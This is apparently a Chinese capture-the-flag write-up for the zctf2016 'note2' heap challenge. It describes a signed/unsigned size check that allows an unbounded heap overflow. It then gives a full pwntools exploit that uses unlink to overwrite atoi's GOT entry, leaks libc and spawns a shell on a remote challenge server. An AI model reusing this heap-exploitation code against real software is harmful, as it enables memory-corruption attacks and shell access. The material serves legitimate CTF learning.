代码量挺大的,逆起来有难度

功能挺全,啥都有

main函数



add函数,有heaparray并且无pie保护,考虑unlink



show函数,可以泄漏地址用



edit函数,有两种edit方式



delete,找不到UAF洞

看了好久,都没找到漏洞,我是five,后来看到了师傅的博客,发现了漏洞点





在add里面没有对size是否小于等于0做检查,在read_input函数里面,有一个有符号整数和无符号整数的比较,漏洞就是二者会强制类型转换为无符号整数,然后size如果输入0的话,就会造成无穷堆溢出

看demo



然后找到漏洞利用点就比较简单了,利用堆溢出来unlink,由于edit函数里面有strcpy这种函数,加个for循环啥的来清空一下就好,这种都是动调,耐心一点儿没啥难度

写个exp改atoi,一把梭

from pwn import *

local = 0

binary = "./note2"

libc_path = '../libc-2.23.so'

port = "29856"

if local == 1:

	p = process(binary)

else:

	p = remote("node3.buuoj.cn",port)

def dbg():

	context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']

def name(name):

	p.recvuntil('Input your name:')

	p.sendline(name)

def address(addr):

	p.recvuntil('Input your address:')

	p.sendline(addr)

def add(size,content):

	p.sendlineafter('option--->>','1')

	p.sendlineafter('Input the length of the note content:(less than 128)',str(size))

	p.sendafter('Input the note content:',content)

def show(index):

	p.sendlineafter('option--->>','2')

	p.sendlineafter('Input the id of the note:',str(index))

def edit(index,choice,content):

	p.sendlineafter('option--->>','3')

	p.sendlineafter('Input the id of the note:',str(index))

	p.sendlineafter('do you want to overwrite or append?[1.overwrite/2.append]',str(choice))

	p.sendafter('TheNewContents:',content)

def free(index):

	p.sendlineafter('option--->>','4')

	p.sendlineafter('Input the id of the note:',str(index))

def leak_libc(addr):

	global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_

	libc = ELF(libc_path)

	libc_base = addr - libc.sym['atoi']

	print "[*] libc base:",hex(libc_base)

	__malloc_hook = libc_base + libc.sym['__malloc_hook']

	system = libc_base + libc.sym['system']

	binsh_addr = libc_base + libc.search('/bin/sh').next()

	__free_hook = libc_base + libc.sym['__free_hook']

	_IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']

elf = ELF(binary)

libc = ELF(libc_path)

heapindex = 0x602160

heaparray = 0x602120

sizearray = 0x602140

# unuseless

name('lemon')

address('i will never give you my secret~')

# heap overflow

fd = heaparray - 0x18

bk = heaparray - 0x10

payload = p64(0) + p64(0x81) + p64(fd) + p64(bk)

payload = payload.ljust(0x30,'a') + '\n'

add(0x60,payload)	# 0

add(0x0,'a' * 0x18 + '\n')	# 1

add(0x80,'cccc\n')	# 2

add(0x10,'/bin/sh\x00\n') # 3

edit(1,1,'a' * 0x18 + '\x90\n')

for i in range(8):

	edit(1,1,'a' * (0x17 - i) + '\x00\n')

edit(1,1,'a' * 0x10 + '\x80\n')

# unlink

free(2)

payload = 'a' * 0x18 + p64(elf.got['atoi']) + '\n'

edit(0,1,payload)

show(0)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

leak_libc(puts_addr)

payload = p64(system) + '\n'

edit(0,1,payload)

p.sendline('sh')

# gdb.attach(p)

p.interactive()

zctf2016_note2:一个隐蔽的漏洞点挖掘的更多相关文章

  1. Java反序列化漏洞的挖掘、攻击与防御

    一.Java反序列化漏洞的挖掘 1.黑盒流量分析: 在Java反序列化传送的包中,一般有两种传送方式,在TCP报文中,一般二进制流方式传输,在HTTP报文中,则大多以base64传输.因而在流量中有一 ...

  2. vmware漏洞之一——转:利用一个堆溢出漏洞实现VMware虚拟机逃逸

    转:https://zhuanlan.zhihu.com/p/27733895?utm_source=tuicool&utm_medium=referral 小结: vmware通过Backd ...

  3. 一个csrf实例漏洞挖掘带你了解什么是csrf

    [-]CSRF是个什么鬼? |___简单的理解: |----攻击者盗用了你的身份,以你的名义进行某些非法操作.CSRF能够使用你的账户发送邮件,获取你的敏感信息,甚至盗走你的财产. |___CSRF攻 ...

  4. 学习CSRF漏洞并挖掘CSRF漏洞

    什么是跨站请求伪造? 跨站请求伪造(英语:Cross-siterequest forgery),也被称为one-clickattack或者session riding,通常缩写为CSRF或者XSRF, ...

  5. 记一次对ctf试题中对git文件泄露的漏洞的挖掘

    拿到题,先f12查看代码 发现情况直接进行访问 最后试了发现flag.js可以访问  服务器返回了如下图所示的乱码 很显然有可能是git泄露  话不多说,直接利用https://github.com/ ...

  6. [PoC]某B2B网站的一个反射型XSS漏洞

    Author: Charlie 个人微博:http://YinYongYou.com 转载请注明出处. 工作过程纯粹手贱,测试了一下.然后发现了这么一个东西.有心利用能造成大范围影响.如可以自由修改用 ...

  7. 【转载】利用一个堆溢出漏洞实现 VMware 虚拟机逃逸

    1. 介绍 2017年3月,长亭安全研究实验室(Chaitin Security Research Lab)参加了 Pwn2Own 黑客大赛,我作为团队的一员,一直专注于 VMware Worksta ...

  8. NULL指针引起的一个linux内核漏洞

    NULL指针一般都是应用于有效性检测的,其实这里面有一个约定俗成的规则,就是说无效指针并不一定是 NULL,只是为了简单起见,规则约定只要指针无效了就将之设置为NULL,结果就是NULL这个指针被用来 ...

  9. 一个iframe注入漏洞,也是微软的 Application["error"] 漏洞

    最近学校进行安全等级评估,有人给我打电话,说我之前写的一个网站存在iframe注入漏洞,页面是error页面.我于是用netsparker扫描了自己的网站,果然发现error页面存在漏洞,我写网站的时 ...

随机推荐

  1. mysql 空值(null)和空字符('')的区别

    日常开发中,一般都会涉及到数据库增删改查,那么不可避免会遇到Mysql中的NULL和空字符. 空字符(")和空值(null)表面上看都是空,其实存在一些差异: 定义: 空值(NULL)的长度 ...

  2. tornado-简介和原理

    tornado-设计初衷 1. 追求小而精 2. epoll IO多路复用和协程 3. 支持WebSocket 4. 单线程程序(GIL限制,本身某种意义上不启动多进程就是单线程程序) # Pytho ...

  3. 使用SSM框架实现Sql数据导出成Excel表

    SSM框架实现SQL数据导出Excel 思路 首先在前端页面中添加一个导出功能的button,然后与后端controller进行交互. 接着在相应的controller中编写导出功能方法. 方法体: ...

  4. 如何检测ASP中的浏览器。NET与浏览器文件

    介绍 ASP.NET是一个用于使用Web表单.MVC.Web API和SignalR(这是官方定义)构建Web应用程序的高生产力框架.它是在.net框架上开发RESTful应用程序或使用HTML.CS ...

  5. python软件安装-Windows

     开发语言: 高级语言:Java.C.PHP.Go.ruby.c++   #字节码 低级语言:C.汇编                                           #机器码 语 ...

  6. Vue结合Django-Rest-Frameword结合实现登录认证(二)

    作者:小土豆biubiubiu 博客园:https://www.cnblogs.com/HouJiao/ 掘金:https://juejin.im/user/2436173500265335 微信公众 ...

  7. Dockerfile常用指令及使用

    Dockerfile常用指令及使用 1. dockerfile介绍 2. Dockerfile常用指令 指令 描述 FROM 构建新镜像是基于哪个镜像 MAINTAINER 进行维护者姓名或邮箱地址 ...

  8. ansible-命令使用说明

    1. ansible命令的使用说明 ansible 主机或组-m 模块名-a '模块参数' ansible参数 表示调用什么模块,使用模块的那些参数 • 主机和组,是在/etc/ansible/hos ...

  9. str常用操作方法

    1. 索引(即下标) s = 'ABCDEFGHIJKLMN' s1 = s[0] print('s[0] = ' + s1) #s[0] = A print('s[3] = '+ s[3]) #s[ ...

  10. 网易新闻精彩评论集合(慢慢收集ing)

    一.刚才在停车场看一男的开个Q7,怎么也停不进去.我迅速把车停好要过去帮忙,他死活不同意.我说,你刚也看见了我的停车技术了,肯定不能给你刮了.他干脆把窗户摇上了.如今的社会啊,人与人的互信程度为什么就 ...